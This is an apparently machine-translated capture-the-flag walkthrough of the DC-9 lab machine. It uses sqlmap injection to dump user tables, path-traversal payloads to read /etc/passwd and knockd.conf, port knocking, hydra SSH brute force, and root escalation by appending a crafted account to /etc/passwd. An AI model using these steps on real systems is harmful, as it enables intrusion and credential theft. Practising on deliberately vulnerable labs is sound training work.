Penetration Testing: DC-9 Drone

1. Scan to obtain the IP address of the target machine

arp-scan -l

192.168.203.148

2. Obtain website information

1.nmap

nmap -sV -A 192.168.203.148

Ports 22 and 80 are open

2.Wappaloyzer

Access the home page

Web server: Apache 2.4.38

3. dirb

dirb http://192.168.203.148

nothing to take advantage of

3. Analyze the website

Display here shows us all user information

Search Here you can query the corresponding information by entering the first or last name

Manage the login user password here, and began to suspect sql injection here, but there was no detection, and finally found that there was sql injection in Search

4.Burp suit

After crawling, it is found that it is a post parameter

5.Sqlmap

Save the data packet to 1.txt for blasting

Explosive library

sqlmap -r /root/1.txt -p search --dbs

Burst the watch

sqlmap -r /root/1.txt -p search -D users --tables

Burst

sqlmap -r /root/1.txt -p search -D users -T UserDetails --columns

burst field

sqlmap -r /root/1.txt -p search -D users -T UserDetails -C firstname,lastname,username,password --dump

+-----------+------------+-----------+---------------+| firstname | lastname   | username  | password      |+-----------+------------+-----------+---------------+| Mary      | Moe        | marym     | 3kfs86sfd     || Julie     | Dooley     | julied    | 468sfdfsd2    || Fred      | Flintstone | fredf     | 4sfd87sfd1    || Barney    | Rubble     | barneyr   | RocksOff      || Tom       | Cat        | tomc      | TC&TheBoyz    || Jerry     | Mouse      | jerrym    | B8m#48sd      || Wilma     | Flintstone | wilmaf    | Pebbles       || Betty     | Rubble     | bettyr    | BamBam01      || Chandler  | Bing       | chandlerb | UrAG0D!       || Joey      | Tribbiani  | joeyt     | Passw0rd      || Rachel    | Green      | rachelg   | yN72#dsd      || Ross      | Geller     | rossg     | ILoveRachel   || Monica    | Geller     | monicag   | 3248dsds7s    || Phoebe    | Buffay     | phoebeb   | smellycats    || Scooter   | McScoots   | scoots    | YR3BVxxxw87   || Donald    | Trump      | janitor   | Ilovepeepee   || Scott     | Morrison   | janitor2  | Hawaii-Five-0 |+-----------+------------+-----------+---------------+

But these accounts cannot log in, and try to use ssh, but ssh is also filtered, and run another database (Staff)

sqlmap -r /root/1.txt -p search -D Staff --tablessqlmap -r /root/1.txt -p search -D Staff -T Users --columnssqlmap -r /root/1.txt -p search -D Staff -T Users --dump

+--------+--------------------------------------------------+----------+| UserID | Password                                         | Username |+--------+--------------------------------------------------+----------+| 1      | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin    |+--------+--------------------------------------------------+----------+admin     transorbital1

Landed successfully

You can see that the prompt File does not exist appears at the bottom of the page, and it feels very likely that it is LFI (local file inclusion)

wfuzz ‐p 127.0.0.1:8080:HTTP             #‐p:添加代理

Dictionary address: https://github.com/danielmiessler/SecLists

We use the burp‐parameter‐names.txt dictionary inside

Use burp to try to blast

http://192.168.203.148/manage.php?a=../../../../etc/passwd

Knowing that the variable name is file

Check the scheduling of tasks in the Linux system through …/…/…/…/…/…/proc/sched_debug

http://192.168.203.148/manage.php?file=../../../../../../proc/sched_debug

4. Connection

Found that the system uses the knockd service

Read the knocked configuration file

http://192.168.203.148/manage.php?file=../../../../../etc/knockd.conf

Method 1 uses nc:
we need to knock on 7469 8475 9842the port in turn to realize the door knocking operation

nc 192.168.203.148 7469
nc 192.168.203.148 8475
nc 192.168.203.148 9842

Method 2 uses nmap:

nmap -p 7469 192.168.203.148
nmap -p 8475 192.168.203.148
nmap -p 9842 192.168.203.148

Use hydra to see which users can log in to ssh, and save the username and password as user.txt and pass.txt files respectively:
PS: There should be no spaces in the dictionary

hydra -L user.txt -P pwd.txt 192.168.203.148 ssh

login: chandlerb   password: UrAG0D!   login: joeyt   password:Passw0rdlogin: janitor   password: Ilovepeepee

ssh connection

ssh [email protected]

Use the blasted user to log in, and then view the file ls -la(you can view the hidden directory file), and janitorfind the hidden secrets-for-putindirectory in the user, which contains the passwordpasswords-found-on-post-it-notes.txt

BamBam01Passw0rdsmellycatsP0Lic#10-4B4-Tru3-0014uGU5T-NiGHts

We add these passwords to the password file and try to blast them again with hydra

hydra -L user.txt -P pwd.txt 192.168.203.148 ssh

blast out a new user

login: fredf   password: B4-Tru3-001

ssh connection

5. Elevation of rights

ssh [email protected] -l

Found that fredf can NO Passwdexecute files with root permissions

Prompt to run with python test.py plus parameters

Enter the /opt/devstuff directory and see the test.py file

Meaning: 3 parameters, add the file content of the second parameter to the third parameter file, the test directory can be executed with root privileges

Idea: Construct an account with root privileges and put it in /etc/passwd, log in with the constructed account, and you will have root privileges

Generate with openssl:

openssl passwd -1 -salt js 233333

$1$js$8LV1DbndSIfP29vG.eYaj1

Write to tmpciyaso in the directory

echo 'js:$1$js$8LV1DbndSIfP29vG.eYaj1:0:0::/root:/bin/bash' > /tmp/js

Execute test:

cd /opt/devstuff/dist/testsudo ./test /tmp/js /etc/passwd

Login is successful, read flag